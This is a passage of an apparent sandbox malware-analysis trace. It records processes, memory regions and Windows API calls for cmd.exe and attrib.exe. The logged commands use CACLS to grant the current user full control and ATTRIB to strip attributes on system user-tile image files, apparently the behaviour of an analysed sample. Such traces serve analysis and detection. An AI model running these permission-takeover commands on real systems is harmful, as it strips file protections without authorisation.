region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 25888 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 25889 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25890 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25891 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25892 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25893 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25894 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25895 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 507 os_tid = 0xe3c Thread: id = 508 os_tid = 0xe20 Process: id = "354" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xe4c" os_integrity_level = "0x3000" 
os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "352" os_parent_pid = "0xd9c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25896 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25897 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25898 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25899 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 25900 start_va = 0x5f0000 end_va = 0x5f6fff entry_point = 0x5f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25901 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25902 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25903 start_va 
= 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25904 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 25905 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25906 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25907 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25908 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25909 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 25910 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 25911 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25912 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25913 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25914 start_va = 0x76480000 end_va = 
0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25915 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25916 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25917 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25918 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25919 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25920 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25921 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25922 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25923 start_va = 0x170000 end_va = 0x237fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 25924 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25925 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 509 os_tid = 0xf50 Process: id = "355" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25926 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25927 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25928 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000040000" filename = "" Region: id = 25929 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 25930 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25931 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25932 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25933 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25934 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25935 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25936 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25937 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25938 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 25939 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 25940 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 25941 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25942 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25943 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25944 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25945 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25946 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25947 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25948 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 25949 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25950 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 25951 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25952 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25953 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 25954 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 25955 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 25956 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 25957 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 25958 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 25959 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 25960 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = 
"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 510 os_tid = 0xee0 [0183.177] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f844 | out: lpSystemTimeAsFileTime=0x30f844*(dwLowDateTime=0xa215bfa0, dwHighDateTime=0x1d440a9)) [0183.177] GetCurrentProcessId () returned 0xe58 [0183.177] GetCurrentThreadId () returned 0xee0 [0183.177] GetTickCount () returned 0x3477a [0183.177] QueryPerformanceCounter (in: lpPerformanceCount=0x30f83c | out: lpPerformanceCount=0x30f83c*=23996660001) returned 1 [0183.178] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0183.178] __set_app_type (_Type=0x1) [0183.178] __p__fmode () returned 0x76b331f4 [0183.178] __p__commode () returned 0x76b331fc [0183.178] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0183.178] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0183.179] GetCurrentThreadId () returned 0xee0 [0183.179] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xee0) returned 0x38 [0183.179] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.179] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0183.179] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.179] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0183.179] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f7d4 | out: phkResult=0x30f7d4*=0x0) returned 0x2 [0183.179] VirtualQuery (in: lpAddress=0x30f80b, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.179] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0183.179] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0183.179] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.179] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0183.179] GetConsoleOutputCP () returned 0x1b5 [0183.179] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.180] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0183.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.180] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0183.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.180] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.180] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.180] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.180] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.180] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.181] SetConsoleMode (hConsoleHandle=0x3, 
dwMode=0x1a7) returned 1 [0183.181] GetEnvironmentStringsW () returned 0xa0308* [0183.181] FreeEnvironmentStringsW (penv=0xa0308) returned 1 [0183.181] GetEnvironmentStringsW () returned 0xa0308* [0183.181] FreeEnvironmentStringsW (penv=0xa0308) returned 1 [0183.181] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e744 | out: phkResult=0x30e744*=0x40) returned 0x0 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0xb8, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x1, lpcbData=0x30e748*=0x4) returned 0x0 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x1, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x0, lpcbData=0x30e748*=0x4) returned 0x0 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x40, lpcbData=0x30e748*=0x4) returned 0x0 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x40, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x40, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.182] RegCloseKey (hKey=0x40) returned 0x0 [0183.182] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e744 | out: phkResult=0x30e744*=0x40) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x40, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x1, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x1, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x0, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x9, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x9, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: 
lpType=0x30e74c*=0x0, lpData=0x30e750*=0x9, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.182] RegCloseKey (hKey=0x40) returned 0x0 [0183.182] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886391 [0183.182] srand (_Seed=0x5b886391) [0183.182] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"" [0183.182] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"" [0183.182] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.183] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0183.183] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.183] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.183] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.183] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0183.183] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0183.183] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0183.183] _wcsicmp (_String1="PROMPT", 
_String2="CMDCMDLINE") returned 13 [0183.183] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0183.183] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0183.183] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0183.183] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0183.183] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0183.184] GetEnvironmentStringsW () returned 0xa2458* [0183.184] FreeEnvironmentStringsW (penv=0xa2458) returned 1 [0183.184] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.184] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.184] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0183.184] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0183.184] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0183.184] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0183.184] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0183.184] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0183.184] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0183.184] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0183.184] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f510 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f510, lpFilePart=0x30f50c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f50c*="Desktop") returned 0x18 [0183.184] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.185] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f28c | out: lpFindFileData=0x30f28c) returned 0xa0ae8 
